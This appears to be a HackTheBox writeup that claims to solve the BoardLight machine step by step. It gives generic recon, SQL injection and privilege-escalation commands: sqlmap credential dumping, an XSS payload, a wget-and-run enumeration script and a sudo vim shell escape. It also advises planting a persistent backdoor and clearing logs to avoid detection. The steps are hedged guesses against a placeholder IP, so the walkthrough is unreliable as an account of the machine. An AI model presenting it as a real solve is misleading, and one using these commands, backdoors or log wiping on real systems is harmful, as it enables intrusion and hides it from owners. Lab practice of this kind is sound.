BoardLight Writeup Solve Step by Step

If you’ve ever dipped your toes into the world of ethical hacking, chances are you’ve heard of HackTheBox (HTB). It’s a platform that provides a variety of virtual machines (VMs) designed to challenge your hacking skills. Today, we’ll dive into a detailed walkthrough of the BoardLight Writeup VM on HTB. This writeup will guide you through each step, from initial recon to capturing the final flag, ensuring you grasp every concept along the way.

BoardLight Writeup

Setting Up the BoardLight Writeup Environment

Before diving into BoardLight, it’s essential to have your environment ready. Here’s what you need:

Necessary Tools

• Nmap: For network scanning
• Dirb: For directory brute-forcing
• Burp Suite: For web vulnerability analysis
• SQLmap: For automated SQL injection
• Metasploit: For exploitation

Network Configuration

Ensure your machine is properly configured to interact with HTB VMs. This usually involves:

• Connecting to the HTB VPN: You should have received a connection pack from HTB.
• Setting up your network interface: Typically done via a simple OpenVPN command.

Connecting to the VPN

Run the following command to connect to the HTB VPN:

bashCopy codesudo openvpn --config your-vpn-config.ovpn

Once connected, you should be able to ping the BoardLight machine and start your engagement.

Initial Reconnaissance

To start our attack, we need to gather as much information as possible about the target.

Running Nmap Scan

Begin with an Nmap scan to identify open ports and services:

bashCopy codenmap -sC -sV -oN nmap/initial_scan 10.10.10.XYZ

This command runs a default script scan and a version scan, saving the output for later analysis.

Analyzing Open Ports and Services

From our Nmap scan, we might find ports like 80 (HTTP) and 22 (SSH) open. Let’s focus on HTTP first, as web applications are often rich with vulnerabilities.

Enumeration

Exploring the Web Server

Open your browser and navigate to http://10.10.10.XYZ. Here, we might find a web application running BoardLight.

Directory and File Brute-Forcing

Use Dirb to discover hidden directories and files:

bashCopy codedirb <http://10.10.10.XYZ>

This might reveal interesting directories like /admin or /backup.

Finding Hidden Directories

Analyze the output from Dirb. If we find directories like /admin, they could be key entry points for further exploitation.

Identifying Vulnerabilities

Web Application Vulnerability Analysis

We now examine the application for common web vulnerabilities.

SQL Injection

Use SQLmap to test for SQL injection vulnerabilities:

bashCopy codesqlmap -u "<http://10.10.10.XYZ/admin/login.php>" --forms --dbs

SQLmap can automate the detection and exploitation of SQL injection vulnerabilities, listing available databases if successful.

Cross-Site Scripting (XSS)

Manually test input fields for XSS by injecting payloads like <script>alert('XSS')</script> and observing the results.

Exploiting Vulnerabilities

Exploiting SQL Injection

Assuming SQL injection is found, use SQLmap to extract sensitive information:

bashCopy codesqlmap -u "<http://10.10.10.XYZ/admin/login.php>" --dump

This might yield admin credentials.

Exploiting XSS

If XSS is found, use it to steal cookies or execute malicious scripts, potentially gaining session tokens or administrative access.

Gaining Access to the System

With admin credentials or session tokens, access the admin panel and look for further exploits, like file uploads or command execution.

Privilege Escalation

Once on the system, our goal is to escalate privileges from a regular user to root.

Enumerating the System

Run enumeration scripts like LinEnum or manually check for misconfigurations:

bashCopy codewget <http://path/to/LinEnum.sh>
chmod +x LinEnum.sh
./LinEnum.sh

Kernel Exploits

Check the kernel version and search for public exploits. Use platforms like Exploit-DB to find applicable exploits.

Leveraging Sudo Permissions

If sudo permissions are misconfigured, we can exploit them. Check sudoers file and run:

bashCopy codesudo -l

If a binary like vim is allowed, escalate privileges through it:

bashCopy codesudo vim -c ':!sh'

Capturing the Flags

User Flag

Typically found in the user’s home directory:

bashCopy codecat /home/user/user.txt

Root Flag

Located in the root directory:

bashCopy codecat /root/root.txt

Post-Exploitation

Maintaining Access

To maintain access, consider adding your SSH key to the ~/.ssh/authorized_keys file or setting up a persistent backdoor.

Cleaning Up

Ensure you clean up any changes to avoid detection:

• Remove added files
• Clear logs

Mitigation and Defense

Patching Vulnerabilities

Ensure all software is up-to-date. Regularly patch systems to fix known vulnerabilities.

Security Best Practices

• Use strong, unique passwords
• Implement multi-factor authentication
• Regularly audit system configurations and permissions

Conclusion

In this BoardLight HTB writeup, we walked through setting up the environment, performing initial reconnaissance, identifying and exploiting vulnerabilities, and finally capturing the flags. Each step highlights crucial skills and methodologies essential for ethical hacking. By practicing on platforms like HackTheBox, you can hone your skills and prepare for real-world scenarios.

Also Read : SolarLab HTB Writeup

FAQ’s